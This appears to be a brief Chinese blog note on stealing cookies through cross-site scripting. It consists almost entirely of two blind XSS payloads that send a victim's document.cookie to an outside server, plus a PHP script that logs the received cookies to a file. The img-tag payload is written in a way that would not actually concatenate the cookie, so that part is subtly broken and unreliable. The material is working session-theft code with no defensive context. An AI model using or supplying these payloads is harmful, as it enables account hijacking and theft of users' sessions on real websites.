XSS打cookie
盲打cookie payload
<script>document.location='http://192.168.0.176/Hcookie.php?cookie='+document.cookie;</script>
<img src='http://192.168.0.176/Hcookie.php?cookie='+document.cookie>
服务器
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt","a");
fwrite($log,$cookie."\n");
fclose($log);
?>

浙公网安备 33010602011771号